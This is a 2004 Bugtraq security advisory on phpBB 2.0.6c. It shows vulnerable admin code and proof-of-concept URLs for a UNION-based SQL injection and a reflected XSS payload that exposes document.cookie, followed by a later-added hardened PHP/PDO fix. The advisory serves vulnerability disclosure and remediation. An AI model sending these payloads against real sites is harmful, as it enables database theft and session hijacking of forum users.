Message-ID: <20040322165811.13527.qmail@www.securityfocus.com>
Date: 22 Mar 2004 16:58:11 -0000
From: Janek Vind <come2waraxe@...oo.com>
To: bugtraq@...urityfocus.com
Subject: [waraxe-2004-SA#009 - Non-critical Sql injection and XSS bug in PhpBB 2.0.6c]

{================================================================================}
{                              [waraxe-2004-SA#009]                              }
{================================================================================}
{                                                                                }
{            [ Non-critical Sql injection and XSS bug in PhpBB 2.0.6c ]          }
{                                                                                }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 16. March 2004
Location: Estonia, Tartu



Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

phpBB is widely used and very popular forum software, written in PHP.
Homepage:  http://www.phpbb.com/


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Original code from  admin_words.php, $Id: admin_words.php,v 1.10.2.2 2002/05/12 15:57:45,
starting from line 74:

-------------------------------

if( $mode == "edit" )
{
	if( $word_id )
	{
		$sql = "SELECT * 
			FROM " . WORDS_TABLE . " 
			WHERE word_id = $word_id";
		if(!$result = $db->sql_query($sql))
		{
			message_die(GENERAL_ERROR, "Could not query words table", "Error", __LINE__, __FILE__, $sql);
		}

		$word_info = $db->sql_fetchrow($result);
		$s_hidden_fields .= '<input type="hidden" name="id" value="' . $word_id . '" />';
	}
	else
	{
		message_die(GENERAL_MESSAGE, $lang['No_word_selected']);
	}
}

--------------------------------

As we can see, the parameter $word_id is placed into the SQL query WITHOUT single quotes, so
SQL injection is possible, for example with the UNION method:

 http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=-1%20UNION%20ALL%20SELECT%20null/*

and we get the following error feedback:

------------------------------------------------

Error Could not query words table

DEBUG MODE

SQL Error : 1222 The used SELECT statements have a different number of columns

SELECT * FROM phpbb_words WHERE word_id = -1 UNION ALL SELECT null/*

Line : 83
File : D:\apache_wwwroot\phpbb206c\admin\admin_words.php

------------------------------------------------

By using so-called "blind" SQL injection methods, any information can be pulled out of the SQL
database. So why am I categorizing this bug as "non-critical"? Because one must first be logged in
as forum administrator for the attack to succeed, so it is not such a "useful" security bug ;)
But let's think again - what if we make a request like this:


http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=1/*"><script>alert(document.cookie);</script

So, in this way, the not-so-useful SQL injection bug turns into a very useful XSS exploit.
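Both findings above come from the same missing step: the id is neither validated before it reaches the query nor escaped when it is written back into the page. The following is a hardened rewrite of the "edit" branch, added here as an example and not phpBB's own code. It accepts only a positive integer id, binds it as a typed query parameter, and HTML-escapes the value placed in the hidden field. It is written for PHP 7 or later and assumes a PDO connection in $db (phpBB 2 used its own database layer, so PDO is a swap-in); WORDS_TABLE, message_die() and $lang are kept from the original, while parse_word_id(), fetch_word() and hidden_id_field() are names chosen for this example.

```php
<?php
// Added example, not phpBB code. Hardened version of the admin_words.php
// "edit" branch from the advisory. Assumes a PDO connection in $db and the
// WORDS_TABLE constant, message_die() and $lang from the original; the
// helper function names below are hypothetical.

declare(strict_types=1);

/**
 * Validate the incoming id before it reaches SQL or HTML.
 * Only a string of decimal digits that parses to a positive integer is
 * accepted; anything else ("-1 UNION ALL SELECT null/*", '1/*">...', "",
 * null) yields null and is rejected by the caller.
 */
function parse_word_id($raw): ?int
{
    if (is_int($raw)) {
        return $raw > 0 ? $raw : null;
    }
    if (!is_string($raw) || !ctype_digit($raw)) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

/**
 * Fetch the word row with a bound integer parameter instead of string
 * concatenation, so the id can never alter the query structure.
 */
function fetch_word(PDO $db, int $word_id): ?array
{
    $stmt = $db->prepare('SELECT * FROM ' . WORDS_TABLE . ' WHERE word_id = :id');
    $stmt->bindValue(':id', $word_id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/**
 * Emit the hidden field with the value HTML-escaped. The id is already an
 * int here, so escaping is belt-and-braces; it matters as soon as this helper
 * is reused for a value that is not numeric.
 */
function hidden_id_field(int $word_id): string
{
    return '<input type="hidden" name="id" value="'
        . htmlspecialchars((string) $word_id, ENT_QUOTES, 'UTF-8')
        . '" />';
}

// The "edit" branch, rewritten to use the helpers above.
if ($mode === 'edit') {
    $word_id = parse_word_id($_GET['id'] ?? null);
    if ($word_id === null) {
        // Same user-facing outcome as the original's "no word selected" path.
        message_die(GENERAL_MESSAGE, $lang['No_word_selected']);
    }

    $word_info = fetch_word($db, $word_id);
    $s_hidden_fields .= hidden_id_field($word_id);
}
```

The order matters: validation rejects the malformed id first, so neither the query nor the error page ever sees the raw request value, and the DEBUG MODE output that echoed the full query in the advisory has nothing attacker-controlled to reflect.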




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum staff and to all IT security related people in Estonia! Tervitused!
Special greets to ulljobu!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@...oo.com
    Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------